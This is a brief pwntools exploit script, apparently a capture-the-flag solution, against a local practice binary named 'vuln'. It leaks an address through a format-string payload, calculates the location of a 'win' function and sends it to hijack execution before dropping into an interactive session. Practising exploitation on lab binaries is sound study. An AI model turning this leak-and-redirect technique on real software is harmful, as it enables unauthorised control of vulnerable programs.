21 lines
327 B
Python
21 lines
327 B
Python
#!/usr/bin/python3
|
|
|
|
from pwn import *
|
|
|
|
context.binary = target = ELF("./vuln", checksec=False)
|
|
r = process()
|
|
|
|
# funcs
|
|
s = lambda a: r.sendlineafter(b":", a)
|
|
|
|
# leak
|
|
s(b"%23$p")
|
|
main = int(r.recvline(), 16)
|
|
log.info("main: %#x", main)
|
|
win = main - 0x96
|
|
log.info("win: %#x", win)
|
|
|
|
# jmp
|
|
s(str(hex(win)).encode())
|
|
|
|
r.interactive() |